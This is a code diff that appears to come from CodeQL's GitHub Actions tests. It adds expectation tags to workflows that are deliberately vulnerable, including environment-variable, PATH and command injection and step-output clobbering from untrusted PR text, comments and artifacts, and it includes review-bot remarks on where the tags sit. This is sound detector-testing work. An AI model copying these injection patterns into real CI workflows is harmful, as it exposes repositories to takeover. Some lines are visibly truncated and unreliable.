-Models/CompositeActionsSummaries.ql - +query: Models/CompositeActionsSummaries.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Models/ReusableWorkflowsSinks.expected b/actions/ql/test/query-tests/Models/ReusableWorkflowsSinks.expected index 18e9f0186dfd..3a496c7751e8 100644 
--- a/actions/ql/test/query-tests/Models/ReusableWorkflowsSinks.expected +++ b/actions/ql/test/query-tests/Models/ReusableWorkflowsSinks.expected @@ -1,3 +1,5 @@ +#select +| .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | Sink | edges | .github/workflows/calling_workflow.yml:12:5:15:2 | Job: call2 [workflow-output1] | .github/workflows/calling_workflow.yml:35:20:35:62 | needs.call2.outputs.workflow-output1 | provenance | | | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | provenance | | @@ -20,5 +22,3 @@ nodes | .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | semmle.label | inputs.config-path | | .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | semmle.label | inputs.config-path | subpaths -#select -| .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | Sink | diff --git a/actions/ql/test/query-tests/Models/ReusableWorkflowsSinks.qlref b/actions/ql/test/query-tests/Models/ReusableWorkflowsSinks.qlref index fa8344d4bf91..8cc9921223a3 100644 --- a/actions/ql/test/query-tests/Models/ReusableWorkflowsSinks.qlref +++ b/actions/ql/test/query-tests/Models/ReusableWorkflowsSinks.qlref @@ -1,2 +1,2 @@ -Models/ReusableWorkflowsSinks.ql - +query: Models/ReusableWorkflowsSinks.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Models/ReusableWorkflowsSources.expected b/actions/ql/test/query-tests/Models/ReusableWorkflowsSources.expected index c76034f74d46..c9132156dad9 100644 
--- a/actions/ql/test/query-tests/Models/ReusableWorkflowsSources.expected +++ b/actions/ql/test/query-tests/Models/ReusableWorkflowsSources.expected @@ -1,3 +1,5 @@ +#select +| .github/workflows/reusable_workflow.yml:13:17:13:52 | jobs.job1.outputs.job-output2 | .github/workflows/reusable_workflow.yml:31:9:33:43 | Uses Step: step2 | .github/workflows/reusable_workflow.yml:13:17:13:52 | jobs.job1.outputs.job-output2 | Source | edges | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | .github/workflows/reusable_workflow.yml:13:17:13:52 | jobs.job1.outputs.job-output2 | provenance | | | .github/workflows/reusable_workflow.yml:23:21:23:63 | steps.step2.outputs.all_changed_files | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | provenance | | @@ -8,5 +10,3 @@ nodes | .github/workflows/reusable_workflow.yml:23:21:23:63 | steps.step2.outputs.all_changed_files | semmle.label | steps.step2.outputs.all_changed_files | | .github/workflows/reusable_workflow.yml:31:9:33:43 | Uses Step: step2 | semmle.label | Uses Step: step2 | subpaths -#select -| .github/workflows/reusable_workflow.yml:13:17:13:52 | jobs.job1.outputs.job-output2 | .github/workflows/reusable_workflow.yml:31:9:33:43 | Uses Step: step2 | .github/workflows/reusable_workflow.yml:13:17:13:52 | jobs.job1.outputs.job-output2 | Source | diff --git a/actions/ql/test/query-tests/Models/ReusableWorkflowsSources.qlref b/actions/ql/test/query-tests/Models/ReusableWorkflowsSources.qlref index fe4299bdba49..4a35c574ad5b 100644 --- a/actions/ql/test/query-tests/Models/ReusableWorkflowsSources.qlref +++ b/actions/ql/test/query-tests/Models/ReusableWorkflowsSources.qlref @@ -1,2 +1,2 @@ -Models/ReusableWorkflowsSources.ql - +query: Models/ReusableWorkflowsSources.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/actions/ql/test/query-tests/Models/ReusableWorkflowsSummaries.expected b/actions/ql/test/query-tests/Models/ReusableWorkflowsSummaries.expected index 8589d82d8259..2a6c4269d525 100644 --- a/actions/ql/test/query-tests/Models/ReusableWorkflowsSummaries.expected +++ b/actions/ql/test/query-tests/Models/ReusableWorkflowsSummaries.expected @@ -1,3 +1,5 @@ +#select +| .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | Summary | edges | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | provenance | | | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | provenance | | @@ -12,5 +14,3 @@ nodes | .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | semmle.label | Run Step: step1 [step-output] | | .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | semmle.label | inputs.config-path | subpaths -#select -| .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | Summary | diff --git a/actions/ql/test/query-tests/Models/ReusableWorkflowsSummaries.qlref b/actions/ql/test/query-tests/Models/ReusableWorkflowsSummaries.qlref index 3547c8a4d07d..7655b5f8010a 100644 --- a/actions/ql/test/query-tests/Models/ReusableWorkflowsSummaries.qlref +++ b/actions/ql/test/query-tests/Models/ReusableWorkflowsSummaries.qlref 
@@ -1,2 +1,2 @@ -Models/ReusableWorkflowsSummaries.ql - +query: Models/ReusableWorkflowsSummaries.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Models/action1/action.yml b/actions/ql/test/query-tests/Models/action1/action.yml index 787fb9f588be..4780a1529f83 100644 --- a/actions/ql/test/query-tests/Models/action1/action.yml +++ b/actions/ql/test/query-tests/Models/action1/action.yml @@ -1,17 +1,17 @@ name: 'Hello World' description: 'Greet someone' inputs: - who-to-greet: # id of input + who-to-greet: # id of input # $ Source[actions/composite-action-sinks] Source[actions/composite-action-summaries] description: 'Who to greet' required: true default: 'World' outputs: reflected: description: "Reflected input" - value: ${{ steps.reflector.outputs.reflected }} + value: ${{ steps.reflector.outputs.reflected }} # $ Alert[actions/composite-action-sources] Alert[actions/composite-action-summaries] tainted: description: "Reflected input" - value: ${{ steps.source.outputs.tainted}} + value: ${{ steps.source.outputs.tainted}} # $ Alert[actions/composite-action-sources] runs: using: "composite" 
@@ -29,23 +29,23 @@ runs: find: 'foo' replace: '' - id: sink - run: echo ${{ steps.replace.outputs.value }} + run: echo ${{ steps.replace.outputs.value }} # $ Alert[actions/composite-action-sinks] shell: bash - name: Vulnerable Set Greeting - run: echo "Hello ${{ inputs.who-to-greet }}." + run: echo "Hello ${{ inputs.who-to-greet }}." # $ Alert[actions/composite-action-sinks] shell: bash - id: reflector run: echo "reflected=$(echo $INPUT_WHO_TO_GREET)" >> $GITHUB_OUTPUT shell: bash env: - INPUT_WHO_TO_GREET: ${{ inputs.who-to-greet }} + INPUT_WHO_TO_GREET: ${{ inputs.who-to-greet }} # $ Source[actions/composite-action-sources] - id: changed-files uses: tj-actions/changed-files@v40 - - id: source + - id: source # $ Source[actions/composite-action-sources] run: echo "tainted=$(echo $TAINTED)" >> $GITHUB_OUTPUT shell: bash env: - TAINTED: ${{ steps.changed-files.outputs.all_changed_files }} + TAINTED: ${{ steps.changed-files.outputs.all_changed_files }} # $ Source[actions/composite-action-sources] diff --git a/actions/ql/test/query-tests/Security/CWE-074/.github/workflows/output1.yml b/actions/ql/test/query-tests/Security/CWE-074/.github/workflows/output1.yml index 01036f711481..73368388c9fd 100644 --- a/actions/ql/test/query-tests/Security/CWE-074/.github/workflows/output1.yml +++ b/actions/ql/test/query-tests/Security/CWE-074/.github/workflows/output1.yml @@ -6,11 +6,11 @@ jobs: steps: - id: clob1 env: - BODY: ${{ github.event.comment.body }} + BODY: ${{ github.event.comment.body }} # $ Source run: | # VULNERABLE echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT - echo "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT + echo "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT # $ Alert - id: clob2 run: | echo ${{ steps.clob1.outputs.OUTPUT_1 }} 
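Review bot: In `action1/action.yml` the `# $ Source[actions/composite-action-sources]` tag on `- id: source` reads as if that `run` step were the taint source, while the data appears to come from the `changed-files` step directly above it. The `.expected` rows later in this patch give a `Uses Step` source the location `path1.yml:21:9:25:6`, so the tag presumably has to sit on the line where the node's location ends, which is the first line of the following step. A trailing comment does not shift line numbers, so I would mark the real source, for example `uses: tj-actions/changed-files@v40 # taint source; its tag is on the next step's first line`, assuming the test utility ignores comments that do not start with `$`. The same placement shows up on `- id: clob1 # $ Source` in output1.yml and on the `- name: Unzip # $ Source[...]` steps in artifactpoisoning52.yml and artifactpoisoning53.yml. The `# $ Alert[...]` on `if-file-not-found: error` in test7.yml looks like the same effect.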
@@ -32,8 +32,8 @@ jobs: with: run_id: ${{ github.event.workflow_run.id }} name: pr_number - - id: clob1 + - id: clob1 # $ Source run: | # VULNERABLE echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT - echo "OUTPUT_2=$(> $GITHUB_OUTPUT + echo "OUTPUT_2=$(> $GITHUB_OUTPUT # $ Alert diff --git a/actions/ql/test/query-tests/Security/CWE-074/.github/workflows/output2.yml b/actions/ql/test/query-tests/Security/CWE-074/.github/workflows/output2.yml index 614de61b0cb7..0e57bee8ac9a 100644 --- a/actions/ql/test/query-tests/Security/CWE-074/.github/workflows/output2.yml +++ b/actions/ql/test/query-tests/Security/CWE-074/.github/workflows/output2.yml @@ -6,18 +6,18 @@ jobs: steps: - id: clob1 env: - BODY: ${{ github.event.comment.body }} + BODY: ${{ github.event.comment.body }} # $ Source run: | # VULNERABLE echo $BODY - echo "::set-output name=OUTPUT::SAFE" + echo "::set-output name=OUTPUT::SAFE" # $ Alert - id: clob2 env: - BODY: ${{ github.event.comment.body }} + BODY: ${{ github.event.comment.body }} # $ Source run: | # VULNERABLE echo "::set-output name=OUTPUT::SAFE" - echo $BODY + echo $BODY # $ Alert - id: clob3 run: | echo ${{ steps.clob1.outputs.OUTPUT }} 
@@ -38,25 +38,25 @@ jobs: with: run_id: ${{ github.event.workflow_run.id }} name: pr_number - - id: clob1 + - id: clob1 # $ Source run: | # VULNERABLE PR="$(> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | .github/workflows/output1.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | Potential clobbering of a step output in $@. | .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | +| .github/workflows/output1.yml:36:14:39:58 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | .github/workflows/output1.yml:30:9:35:6 | Uses Step | .github/workflows/output1.yml:36:14:39:58 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | Potential clobbering of a step output in $@. | .github/workflows/output1.yml:36:14:39:58 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | +| .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | .github/workflows/output2.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | Potential clobbering of a step output in $@. 
| .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | +| .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | .github/workflows/output2.yml:16:18:16:49 | github.event.comment.body | .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | Potential clobbering of a step output in $@. | .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | +| .github/workflows/output2.yml:42:14:46:48 | # VULNERABLE\nPR="$(> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | provenance | Config | | .github/workflows/output1.yml:30:9:35:6 | Uses Step | .github/workflows/output1.yml:36:14:39:58 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | provenance | Config | 
@@ -22,12 +31,3 @@ nodes | .github/workflows/output2.yml:53:14:56:19 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\nls *.txt\n | semmle.label | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\nls *.txt\n | | .github/workflows/output2.yml:58:14:62:48 | # VULNERABLE\nCURRENT_VERSION=$(cat gradle.properties \| sed -n '/^version=/ { s/^version=//;p }')\necho "$CURRENT_VERSION"\necho "::set-output name=OUTPUT::SAFE"\n | semmle.label | # VULNERABLE\nCURRENT_VERSION=$(cat gradle.properties \| sed -n '/^version=/ { s/^version=//;p }')\necho "$CURRENT_VERSION"\necho "::set-output name=OUTPUT::SAFE"\n | subpaths -#select -| .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | .github/workflows/output1.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | Potential clobbering of a step output in $@. | .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | -| .github/workflows/output1.yml:36:14:39:58 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | .github/workflows/output1.yml:30:9:35:6 | Uses Step | .github/workflows/output1.yml:36:14:39:58 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | Potential clobbering of a step output in $@. 
| .github/workflows/output1.yml:36:14:39:58 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | -| .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | .github/workflows/output2.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | Potential clobbering of a step output in $@. | .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | -| .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | .github/workflows/output2.yml:16:18:16:49 | github.event.comment.body | .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | Potential clobbering of a step output in $@. | .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | -| .github/workflows/output2.yml:42:14:46:48 | # VULNERABLE\nPR="$(> $GITHUB_ENV + echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning52.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning52.yml index e4845a6f2f16..0a19c76c769a 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning52.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning52.yml 
@@ -12,14 +12,14 @@ jobs: steps: - run: | gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" - - name: Unzip + - name: Unzip # $ Source[actions/envvar-injection/critical] run: | unzip artifact_name.zip -d foo - name: Env Var Injection run: | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}" cat foo >> "$GITHUB_ENV" - echo "EOF" >> "${GITHUB_ENV}" + echo "EOF" >> "${GITHUB_ENV}" # $ Alert[actions/envvar-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning53.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning53.yml index 67209267b5c5..c157d791f396 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning53.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning53.yml @@ -12,7 +12,7 @@ jobs: steps: - run: | gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" - - name: Unzip + - name: Unzip # $ Source[actions/envvar-injection/critical] run: | unzip artifact_name.zip -d foo - run: | @@ -20,7 +20,7 @@ jobs: echo 'JSON_RESPONSE<> "$GITHUB_ENV" + } >> "$GITHUB_ENV" # $ Alert[actions/envvar-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/path1.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/path1.yml index d22f09c03bdb..c071d54236d7 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/path1.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/path1.yml 
@@ -10,23 +10,23 @@ jobs: - run: echo "${{ github.event.pull_request.title }}" >> $GITHUB_PATH - env: - PATHINJ: ${{ github.event.pull_request.title }} - run: echo $(echo "$PATHINJ") >> $GITHUB_PATH + PATHINJ: ${{ github.event.pull_request.title }} # $ Source[actions/envpath-injection/critical] + run: echo $(echo "$PATHINJ") >> $GITHUB_PATH # $ Alert[actions/envpath-injection/critical] - env: - PATHINJ: ${{ github.event.pull_request.title }} - run: echo $PATHINJ >> $GITHUB_PATH + PATHINJ: ${{ github.event.pull_request.title }} # $ Source[actions/envpath-injection/critical] + run: echo $PATHINJ >> $GITHUB_PATH # $ Alert[actions/envpath-injection/critical] - env: - PATHINJ: ${{ github.event.pull_request.title }} - run: echo ${PATHINJ} >> $GITHUB_PATH + PATHINJ: ${{ github.event.pull_request.title }} # $ Source[actions/envpath-injection/critical] + run: echo ${PATHINJ} >> $GITHUB_PATH # $ Alert[actions/envpath-injection/critical] - uses: dawidd6/action-download-artifact@v2 with: name: artifact_name path: foo - - run: echo "$(cat foo/bar)" >> $GITHUB_PATH + - run: echo "$(cat foo/bar)" >> $GITHUB_PATH # $ Alert[actions/envpath-injection/critical] Source[actions/envpath-injection/critical] - env: ACTIONS_ALLOW_UNSECURE_COMMANDS: true - PATHINJ: ${{ github.event.pull_request.title }} - run: echo "::add-path::$PATHINJ" + PATHINJ: ${{ github.event.pull_request.title }} # $ Source[actions/envpath-injection/critical] + run: echo "::add-path::$PATHINJ" # $ Alert[actions/envpath-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test10.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test10.yml index f43a12cb42a3..0811e61cfc65 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test10.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test10.yml 
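Review bot: The first step in this hunk, `- run: echo "${{ github.event.pull_request.title }}" >> $GITHUB_PATH`, is the only write to `$GITHUB_PATH` in path1.yml left without a `# $ Alert[actions/envpath-injection/critical]` tag, and the `#select` rows added to EnvPathInjectionCritical.expected have no entry for it either. If that is intended, the fixture should say so, otherwise the line reads as a missed result. The expression is expanded into the script text before the shell runs, so it is presumably left to a different query. A trailing comment keeps the line numbers in the `.expected` file stable, for example `# no envpath-injection alert expected: direct expression interpolation` (wording for the query authors to confirm).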
@@ -23,6 +23,6 @@ jobs: ref: ${{steps.decide-ref.outputs.ref}} path: "foo" - - name: Read Java Config - run: cat foo/.github/java-config.env >> $GITHUB_ENV + - name: Read Java Config # $ Source[actions/envvar-injection/critical] + run: cat foo/.github/java-config.env >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test11.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test11.yml index 5edd526d8201..58e0f2edf9c2 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test11.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test11.yml @@ -18,11 +18,11 @@ jobs: run_id: ${{ github.event.workflow_run.id }} name: runtime-versions.md - - name: "Put runtime versions on the environment" + - name: "Put runtime versions on the environment" # $ Source[actions/envvar-injection/critical] id: runtime_versions run: | { echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV" + } >> "$GITHUB_ENV" # $ Alert[actions/envvar-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test12.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test12.yml index 3a0c4cc91b82..097e3a09a114 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test12.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test12.yml @@ -43,14 +43,14 @@ jobs: run_id: ${{ github.event.workflow_run.id }} name: runtime-versions.md - - name: "Put runtime versions on the environment" + - name: "Put runtime versions on the environment" # $ Source[actions/envvar-injection/critical] id: runtime_versions run: | { echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV" + } >> "$GITHUB_ENV" # $ Alert[actions/envvar-injection/critical] - name: "Download pre-release report" uses: dawidd6/action-download-artifact@v2 
@@ -58,14 +58,14 @@ jobs: run_id: ${{ github.event.workflow_run.id }} name: prerelease-report.md - - name: "Put pre-release report on the environment" + - name: "Put pre-release report on the environment" # $ Source[actions/envvar-injection/critical] id: prerelease_report run: | { echo 'PRERELEASE_REPORT<> "$GITHUB_ENV" + } >> "$GITHUB_ENV" # $ Alert[actions/envvar-injection/critical] - name: "Comment on PR with Wrangler link" uses: marocchino/sticky-pull-request-comment@v2 diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test13.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test13.yml index 78d288fb9822..278cea70f19a 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test13.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test13.yml @@ -17,7 +17,7 @@ jobs: - name: Get commit message run: | COMMIT_MESSAGE=$(git log --format=%s) - echo "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV + echo "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] - name: Get commit message run: | - echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV + echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test14.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test14.yml index 93854c5e889f..5b9bd4e278c7 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test14.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test14.yml 
@@ -12,7 +12,7 @@ jobs: ref: ${{ github.event.pull_request.head.sha }} - id: changed-files run: | - echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV" + echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV" # $ Alert[actions/envvar-injection/critical] - run: echo "${{ env.CHANGED-FILES }}" test2: runs-on: ubuntu-latest @@ -23,7 +23,7 @@ jobs: - id: changed-files run: | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/) - echo "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV" + echo "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV" # $ Alert[actions/envvar-injection/critical] - run: echo "${{ env.CHANGED-FILES }}" diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test15.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test15.yml index 89ecd8c0ec3e..85d6109cd492 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test15.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test15.yml @@ -9,7 +9,7 @@ jobs: steps: - id: title run: | - echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV" + echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV" # $ Alert[actions/envvar-injection/critical] - run: echo "$TITLE" test2: runs-on: ubuntu-latest @@ -17,7 +17,7 @@ jobs: - id: title run: | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH}) - echo "BODY=$PR_BODY" >> "$GITHUB_ENV" + echo "BODY=$PR_BODY" >> "$GITHUB_ENV" # $ Alert[actions/envvar-injection/critical] - run: echo "$TITLE" test3: runs-on: ubuntu-latest diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test16.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test16.yml index efcfda0e4c76..87a02ca5a1d9 100644 
--- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test16.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test16.yml @@ -12,12 +12,12 @@ jobs: with: workflow: ${{ github.event.workflow_run.workflow_id }} name: pr_metadata - - run: | + - run: | # $ Source[actions/envvar-injection/critical] # VULNERABLE - echo "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV + echo "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] - run: | # VULNERABLE - echo "PR_NUMBER=$(cat pr_number.txt | tr ',' '\n')" >> $GITHUB_ENV + echo "PR_NUMBER=$(cat pr_number.txt | tr ',' '\n')" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] - run: | # NOT VULNERABLE echo "PR_NUMBER=$(cat pr_number.txt | tr '\n' ' ')" >> $GITHUB_ENV diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test2.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test2.yml index c902b7e61bd2..de66e4cf253f 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test2.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test2.yml @@ -38,6 +38,6 @@ jobs: }); var fs = require('fs'); fs.writeFileSync('${{github.workspace}}/pr.zip', Buffer.from(downloadPr.data)); - - run: | + - run: | # $ Source[actions/envvar-injection/critical] unzip pr.zip - echo "pr_number=$(cat NR)" >> $GITHUB_ENV + echo "pr_number=$(cat NR)" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test3.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test3.yml index f76454c6088f..5059ee9d0da3 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test3.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test3.yml 
